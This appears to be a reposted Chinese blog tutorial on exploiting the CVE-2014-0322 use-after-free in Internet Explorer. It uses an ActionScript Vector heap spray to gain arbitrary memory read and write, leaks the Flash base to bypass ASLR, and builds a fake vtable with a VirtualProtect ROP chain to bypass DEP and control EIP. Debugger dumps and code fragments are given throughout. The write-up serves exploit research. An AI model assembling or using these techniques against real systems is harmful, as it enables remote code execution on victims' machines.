CVE-2014-0322 Exploit ActionScript Heap Spray

栏目: JavaScript · 发布时间: 6年前

内容简介:之前调试CVE-2014-0322这个洞的时候用的是Js的heapspray技术,这几天因为在项目中尝试一点新的利用方法稍微做了点关于ActionScript的喷射利用技术,还是挺有意思,不过也是和Js的heapspray技术差不太多。总体利用思路是通过漏洞修改数组长度达到地址任意读写,继而leak基址构造rop,修改虚表指针达到控制eip跳到rop链。调试环境:CVE-2014-0322在之前的漏洞分析文章中已经提过了,一个经典的UAF漏洞,通过控制内存占位可以达到inc一个字节的目的,内存占位的poc

之前调试CVE-2014-0322这个洞的时候用的是Js的heapspray技术,这几天因为在项目中尝试一点新的利用方法稍微做了点关于ActionScript的喷射利用技术,还是挺有意思,不过也是和Js的heapspray技术差不太多。总体利用思路是通过漏洞修改数组长度达到地址任意读写,继而leak基址构造rop,修改虚表指针达到控制eip跳到rop链。

调试环境:

Windows 7 SP1
mshtml 10.0.9200.16438
kernel32 6.1.7601.17932
Adobe Flash 15.0.0.223

0x02 漏洞分析

CVE-2014-0322在之前的漏洞分析文章中已经提过了,一个经典的UAF漏洞,通过控制内存占位可以达到inc一个字节的目的,内存占位的poc

function handler() {
  this.outerHTML = this.outerHTML;

    elem = document.createElement("div");
    elem.className = add(0x7c/2) + dword2date(0x12121008) + add(0x14/2) + dword2date(0x12121000) + dword2date(0x12121008) + add(0x10/2) + dword2date(0x12120ff3) + add(0x290/2-2);			
}

0x03 ActionScript Vector 喷射

测试采用的是Flash 15的版本(实际测试15、16、17、18都可以很好的支持)

public function Main():void 
	{
		for (var i:int = 0; i < spray.length; i++) {
			spray[i] = new Vector.<uint>(1008)
			spray[i][1] = 0x12121014
			spray[i][2] = 0x12120d28
		}
}

这样可以在IE10的环境下(IE11也支持)精确的喷射。

0:018> dd 12122000
12122000  000003f0 064b2000 00000000 12121014
12122010  12120d28 00000000 00000000 00000000
12122020  00000000 00000000 00000000 00000000
12122030  00000000 00000000 00000000 00000000
12122040  00000000 00000000 00000000 00000000
12122050  00000000 00000000 00000000 00000000
12122060  00000000 00000000 00000000 00000000
12122070  00000000 00000000 00000000 00000000
0:018> dd 12123000
12123000  000003f0 064b2000 00000000 12121014
12123010  12120d28 00000000 00000000 00000000
12123020  00000000 00000000 00000000 00000000
12123030  00000000 00000000 00000000 00000000
12123040  00000000 00000000 00000000 00000000
12123050  00000000 00000000 00000000 00000000
12123060  00000000 00000000 00000000 00000000
12123070  00000000 00000000 00000000 00000000

可以看出每一个Vector对象中第一个dword是对象的大小,第二个是应该是对象指针,第三个dword以后就是Vector的数据了,这样我们就可以通过漏洞修改某一个Vector数组的长度直接数组越界写,在修改下一个Vector的长度为0xffffffff直接达到内存任意读写目的(这里adobe居然没有进行任何安全检查简直ZZ Orz)

0x04 内存任意读写

在将一个Vector的长度修改以后,接下来就可以越界读写后一个Vector的长度大小,直接简单粗暴修改为0xffffffff,内存任意读写

0:018> dd 12122000
12122000  ffffffff 05f32000 00000000 12121014
12122010  12120d28 00000000 00000000 00000000
12122020  00000000 00000000 00000000 00000000
12122030  00000000 00000000 00000000 00000000
12122040  00000000 00000000 00000000 00000000
12122050  00000000 00000000 00000000 00000000
12122060  00000000 00000000 00000000 00000000
12122070  00000000 00000000 00000000 00000000

0x05 leak基址 & Bypass ASLR

leak基址就很简单了,已经内存任意读,读到Vector对象的虚表地址,直接根据偏移就可以计算出Flash的加载基址,获得Flash的基址以后,在根据Flash的导入表就可以得到VritualProtect地址,根据leak的VritualProtect地址就可以很方便的构造一个非常简单的rop链。

0x06 控制eip & Bypass DEP

控制eip我们需要修改Vector对象的虚表,将Vector的虚表指针修改成堆上的地址,在调用Vector的函数控制eip。

write(spray[i][i2 + 1] - 1, 0x12122008, i)   //将Vector对象的虚表改为堆上的地址,伪造一个虚表

//伪造一个虚表,使得执行writeUTF函数的时候指向的是xchg_eax_esp的地址,达到控制eip的效果,在bypass DEP
spray[i][00] = virtualprotect_addr
spray[i][01] = 0x121220a0
spray[i][02] = 0x12122018
spray[i][03] = 0x200
spray[i][04] = 0x40
spray[i][05] = 0x12122008
spray[i][35] = xchg_eax_esp_addr

//调用虚函数,控制EIP
ba.writeUTF("calc")

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

逻辑的引擎

逻辑的引擎

[美] 马丁·戴维斯 / 张卜天 / 湖南科学技术出版社 / 2005-5 / 20.00元

本书介绍了现代计算机背后的那些基本概念和发展这些概念的人,描写了莱布尼茨、布尔、费雷格、康托尔、希尔伯特、哥德尔、图灵等天才的生活和工作,讲述了数学家们如何在成果付诸应用之前很久就已经提出了其背后的思想。博达著作权代理有限公司授权出版据美国W.W.Norton公司2000年版本译出。2007年第二版亦使用同一ISBN。一起来看看 《逻辑的引擎》 这本书的介绍吧!

MD5 加密
MD5 加密

MD5 加密工具

SHA 加密
SHA 加密

SHA 加密工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具